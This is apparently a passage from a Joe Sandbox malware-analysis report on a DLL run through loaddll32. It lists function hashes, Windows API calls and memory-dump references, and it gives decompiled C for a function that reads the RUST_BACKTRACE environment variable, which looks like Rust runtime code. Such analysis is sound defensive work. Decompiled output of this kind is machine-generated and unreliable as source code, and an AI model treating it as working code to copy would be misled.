Opcode ID: c8bd9358c22b034b7074f7c518e48d783437be95bdf591a7655e90d4f74757d1
Instruction ID: 2373bf27eb9463a5329f837dc30e982edc8ad0329f93506aa7606d2b120a775a
Opcode Fuzzy Hash: c8bd9358c22b034b7074f7c518e48d783437be95bdf591a7655e90d4f74757d1
Instruction Fuzzy Hash: E4E0867134479725F9551BF54E27BFA265D2F8571DF101814AB18ECCC6FF89802BC011

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE1C23, Relevance: 1.5, APIs: 1, Instructions: 23
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,6ECE1E1B,?,?,?,?,00000000,?,00000000,?,?,6ECE4EAE,?,6ECE4D3D,00000000,?), ref: 6ECE1C3F

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 102b569e04b60e1afeec478f3f74c61dabbc000b6a9e22308e7087f0afd3de20
Instruction ID: 42ede581d2d211c31c5e76f56723707aa92b21a5322ad8efb7b0a8f91a152817
Opcode Fuzzy Hash: 102b569e04b60e1afeec478f3f74c61dabbc000b6a9e22308e7087f0afd3de20
Instruction Fuzzy Hash: FDE0C27038439B21F9191BE40E2BBE92A5D2B85B1DF000418A718ECCC6FF8480278011

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE2C26, Relevance: 1.3, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(00000008,?,?,?,6ECE283F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6ECDCB0C,?,?,6ECDC074), ref: 6ECE2C67

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 9804aeed2944f9b0250a272d72e5df988eb1928a619caf5edc613548f6d5c5d4
Instruction ID: 8f6ba403c9f62a2ad1ae8f5c14d863c58570d13c82a752629df0c525f04b771f
Opcode Fuzzy Hash: 9804aeed2944f9b0250a272d72e5df988eb1928a619caf5edc613548f6d5c5d4
Instruction Fuzzy Hash: E6F0E932244A276AFB5D1BF7C926BDB7B5CAF41760B008512FC14ABD88FB30D41282E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE22E9, Relevance: 1.3, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(00000000,?,?,?,6ECDCB0C,?,?,6ECDC074,00000400,FFFDC801,?,?,00000001), ref: 6ECE231B

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: bd210d3af71a1ba5fc36e2b05012969076e893725cebe0dda93e51e692beec0f
Instruction ID: b364af7ffa30e66a4ec84648db600b3ee951031e26848c0c2d721c5e08bea01e
Opcode Fuzzy Hash: bd210d3af71a1ba5fc36e2b05012969076e893725cebe0dda93e51e692beec0f
Instruction Fuzzy Hash: 18E065321416279AFA6A16E64C20B9A765CBF423A1F010520ED5497F88FB10C80189E1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE228A, Relevance: 1.3, APIs: 1, Instructions: 9
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,?,6ECE0ED2,00000000,6ED1B1B8,0000000C,6ECE0E99,?,?,6ECE2C59,?,?,6ECE283F,00000001,00000364,?), ref: 6ECE2299

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: 10a37ef6a1ffba0d3f27361699e80f7bdd01de739c45b55315e0567ef9ece968
Instruction ID: c434b69164eff8787540c64cdba2211a06411ee4179ff76db154b771a81ec68e
Opcode Fuzzy Hash: 10a37ef6a1ffba0d3f27361699e80f7bdd01de739c45b55315e0567ef9ece968
Instruction Fuzzy Hash: FFB09B72444208678F009695DD4D8957B6C95D16517954411F41D87511D531D7544694

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6ECCD380, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E6ECCD380(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6ECD39D0;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6ed1e128; // 0xa40000
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6ECE9A30( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6ed0face;
							if(_t264 != 0x6ed0face) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6ed0face;
									if(_t229 == 0x6ed0face) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6ed0face;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6ed0face;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6ed0face;
											if(_t264 == 0x6ed0face) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6ed0face;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6ed0face;
												if(_t273 == 0x6ed0face) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6ed0face;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6ECE9A30( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6ECDE9D0(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6ed0f8cc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6ECE9A30( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6ECD0D10(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6ed1e128, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6ed1e128, 0, _t167);
													}
													HeapFree( *0x6ed1e128, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6ed1e128, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6ed106d8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6ed1e128, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6ed1e128, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6ed1e128, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6ECE92F0(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6ECE9470(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6ed106e0);
						asm("ud2");
						__eflags =  &_a8;
						E6ECC48D0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6ECCD270(_t263);
					} else {
						 *0x6ed1e128 = _t142;
						goto L3;
					}
				}
				L96:
			}

0x6eccd380
0x6eccd380
0x6eccd380
0x6eccd383
0x6eccd384
0x6eccd385
0x6eccd386
0x6eccd38c
0x6eccd38f
0x6eccd396
0x6eccd39d
0x6eccd3aa
0x6eccd3ad
0x6eccd3b3
0x6eccd3ba
0x6eccd3ce
0x6eccd3d3
0x6eccd3da
0x00000000
0x6eccd3e0
0x6eccd3e0
0x6eccd3e6
0x6eccd3eb
0x6eccd3ed
0x6eccd3f2
0x6eccd3f8
0x6eccd402
0x6eccd40c
0x6eccd43d
0x6eccd440
0x6eccd443
0x00000000
0x00000000
0x6eccd445
0x6eccd44c
0x6eccd454
0x6eccd42f
0x6eccd42f
0x6eccd432
0x6eccd436
0x6eccd437
0x00000000
0x6eccd456
0x6eccd48a
0x6eccd494
0x6eccd497
0x6eccd49e
0x6eccd4a9
0x6eccd4b2
0x6eccd4ba
0x6eccd4bd
0x6eccd4c1
0x6eccd4c6
0x6eccd420
0x6eccd426
0x6eccd429
0x6eccd42c
0x00000000
0x6eccd42c
0x6eccd460
0x6eccd466
0x6eccd468
0x6eccd46e
0x6eccd471
0x6eccd474
0x6eccd477
0x6eccd479
0x6eccd4d1
0x6eccd4da
0x6eccd4dc
0x6eccd503
0x6eccd50b
0x6eccd50e
0x6eccd513
0x6eccd516
0x00000000
0x6eccd518
0x6eccd518
0x6eccd51c
0x6eccd522
0x6eccd524
0x6eccd52a
0x00000000
0x6eccd530
0x00000000
0x6eccd530
0x6eccd52a
0x6eccd4de
0x6eccd4de
0x6eccd4e2
0x6eccd4e5
0x6eccd4e8
0x6eccd4eb
0x6eccd53b
0x6eccd53d
0x6eccd543
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccd4ed
0x6eccd4f3
0x6eccd4f5
0x6eccd565
0x6eccd565
0x6eccd567
0x6eccd4f7
0x6eccd4fb
0x6eccd4fe
0x6eccd4fe
0x6eccd56a
0x6eccd56d
0x6eccd56f
0x6eccd572
0x6eccd595
0x6eccd597
0x6eccd59a
0x6eccd5a0
0x00000000
0x6eccd5a2
0x00000000
0x6eccd5a2
0x6eccd574
0x6eccd574
0x6eccd57d
0x6eccd57f
0x6eccd5aa
0x6eccd5aa
0x6eccd5ac
0x6eccd581
0x6eccd587
0x6eccd58a
0x6eccd58a
0x6eccd5bf
0x6eccd5c1
0x6eccd5c4
0x6eccd5ca
0x6eccd549
0x6eccd549
0x6eccd54c
0x6eccd54e
0x6eccd554
0x00000000
0x6eccd55a
0x00000000
0x6eccd55a
0x6eccd5d0
0x6eccd5d0
0x6eccd5d0
0x6eccd5d6
0x6eccd5f0
0x6eccd5f3
0x6eccd5f6
0x6eccd5f8
0x6eccd5fb
0x6eccd601
0x00000000
0x6eccd607
0x00000000
0x6eccd607
0x6eccd601
0x6eccd5ca
0x6eccd572
0x6eccd4eb
0x6eccd47b
0x6eccd47b
0x6eccd47d
0x6eccd480
0x6eccd482
0x6eccd488
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccd488
0x00000000
0x6eccd479
0x6eccd60c
0x6eccd612
0x6eccd61a
0x6eccd61d
0x6eccd622
0x6eccd625
0x6eccd627
0x6eccd62a
0x6eccd62c
0x6eccd674
0x6eccd674
0x6eccd676
0x6eccd680
0x6eccd680
0x6eccd682
0x00000000
0x00000000
0x6eccd688
0x6eccd68b
0x6eccd68f
0x6eccd692
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccd692
0x6eccd720
0x6eccd723
0x6eccd725
0x6eccd731
0x6eccd736
0x6eccd739
0x6eccd73c
0x6eccd73c
0x6eccd73f
0x6eccd745
0x6eccd74a
0x6eccd74f
0x6eccd752
0x6eccd754
0x6eccd757
0x00000000
0x6eccd75d
0x6eccd760
0x6eccd771
0x6eccd776
0x6eccd779
0x6eccd77e
0x6eccd783
0x6eccd785
0x6eccd788
0x6eccd78f
0x6eccd792
0x6eccd799
0x6eccd79f
0x6eccd7c2
0x6eccd7c7
0x6eccd7cb
0x6eccd7cd
0x6eccd7cf
0x6eccd7d2
0x6eccd7df
0x6eccd7e4
0x6eccd7ea
0x6eccd7ed
0x6eccd7ed
0x6eccd7f0
0x6eccd7f3
0x6eccd7f5
0x6eccd7f8
0x6eccd7a1
0x6eccd800
0x6eccd800
0x6eccd806
0x6eccd806
0x6eccd80d
0x6eccd80d
0x6eccd812
0x6eccd81d
0x6eccd823
0x6eccd825
0x6eccd827
0x6eccd833
0x6eccd833
0x6eccd835
0x6eccd7b0
0x6eccd7b0
0x6eccd7b2
0x6eccd7b4
0x6eccd876
0x6eccd879
0x6eccd880
0x6eccd882
0x00000000
0x6eccd888
0x6eccd88e
0x6eccd88f
0x6eccd894
0x6eccd897
0x6eccd89a
0x6eccd89d
0x6eccd8a0
0x6eccd8a2
0x6eccd8a5
0x6eccd8a7
0x00000000
0x00000000
0x6eccd8a9
0x00000000
0x6eccd8a7
0x6eccd7ba
0x6eccd7ba
0x6eccd7c0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccd7c0
0x6eccd83b
0x6eccd83b
0x6eccd841
0x6eccd844
0x00000000
0x6eccd84a
0x6eccd84a
0x6eccd84c
0x6eccd852
0x00000000
0x6eccd854
0x00000000
0x6eccd854
0x00000000
0x6eccd852
0x6eccd844
0x6eccd829
0x6eccd829
0x6eccd82f
0x6eccd831
0x6eccd8ab
0x6eccd8ad
0x6eccd8b3
0x6eccd8b5
0x6eccd8b7
0x6eccd8ba
0x6eccd8bc
0x6eccd8be
0x6eccd8be
0x6eccd8c2
0x6eccd8c4
0x6eccd8c9
0x6eccd8d6
0x6eccd8d9
0x6eccd8de
0x6eccd8de
0x6eccd8c9
0x6eccd8c2
0x6eccd8e1
0x6eccd8e1
0x6eccd8e3
0x6eccd93d
0x6eccd940
0x6eccd942
0x6eccd945
0x6eccd8e5
0x6eccd8e8
0x6eccd8eb
0x6eccd8f1
0x6eccd8f8
0x6eccd900
0x6eccd903
0x6eccd905
0x6eccd908
0x6eccd90b
0x6eccd90e
0x6eccd912
0x6eccd914
0x6eccd916
0x6eccd91a
0x6eccd91c
0x6eccd91c
0x6eccd928
0x6eccd928
0x6eccd936
0x6eccd936
0x6eccd8f1
0x6eccd948
0x6eccd94f
0x6eccd960
0x6eccd960
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccd831
0x6eccd827
0x6eccd62e
0x6eccd62e
0x6eccd630
0x6eccd632
0x6eccd632
0x6eccd636
0x00000000
0x00000000
0x6eccd638
0x6eccd63d
0x00000000
0x6eccd63f
0x6eccd63f
0x6eccd644
0x00000000
0x6eccd646
0x6eccd646
0x6eccd64b
0x00000000
0x6eccd64d
0x6eccd64d
0x6eccd652
0x00000000
0x6eccd654
0x6eccd654
0x6eccd659
0x00000000
0x6eccd65b
0x6eccd65b
0x6eccd660
0x00000000
0x6eccd662
0x6eccd662
0x6eccd667
0x00000000
0x6eccd669
0x6eccd669
0x6eccd66c
0x6eccd66f
0x6eccd672
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccd672
0x6eccd667
0x6eccd660
0x6eccd659
0x6eccd652
0x6eccd64b
0x6eccd644
0x00000000
0x6eccd63d
0x6eccd694
0x6eccd694
0x6eccd697
0x6eccd69e
0x6eccd6a5
0x6eccd6a7
0x6eccd6a9
0x6eccd6ab
0x6eccd6ad
0x6eccd6b3
0x6eccd6be
0x6eccd6be
0x6eccd6b3
0x6eccd6ab
0x6eccd6c3
0x6eccd6c7
0x6eccd6cd
0x6eccd6d2
0x6eccd6d5
0x6eccd6d8
0x6eccd6e0
0x6eccd6e2
0x6eccd6e5
0x6eccd6e8
0x6eccd6eb
0x6eccd6ef
0x6eccd6f1
0x6eccd6f3
0x6eccd6f7
0x6eccd6f9
0x6eccd6f9
0x6eccd705
0x6eccd70a
0x6eccd70a
0x6eccd716
0x6eccd716
0x6eccd859
0x6eccd85c
0x6eccd862
0x6eccd862
0x6eccd865
0x6eccd875
0x6eccd875
0x00000000
0x6eccd62c
0x6eccd43d
0x6eccd3bc
0x6eccd3bc
0x6eccd3c3
0x6eccd96a
0x6eccd96f
0x6eccd974
0x6eccd979
0x6eccd97b
0x6eccd982
0x6eccd98a
0x6eccd994
0x6eccd99f
0x6eccd9af
0x6eccd3c9
0x6eccd3c9
0x00000000
0x6eccd3c9
0x6eccd3c3
0x00000000

APIs

GetProcessHeap.KERNEL32 ref: 6ECCD3BC
HeapAlloc.KERNEL32(00A40000,00000000,0000000A), ref: 6ECCD3D3

Strings

RUST_BACKTRACE, xrefs: 6ECCD48A, 6ECCD4C0

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: Heap$AllocProcess
String ID: RUST_BACKTRACE
API String ID: 1617791916-3454309823
Opcode ID: ec6aaca04476368eac450f417d06f62ed40ac775edf36c46eb97f0765f0bfb3d
Instruction ID: 985006805b262316598c77f4030ae482a288462bde6eb0b4a798cd7be7fd8c9f
Opcode Fuzzy Hash: ec6aaca04476368eac450f417d06f62ed40ac775edf36c46eb97f0765f0bfb3d
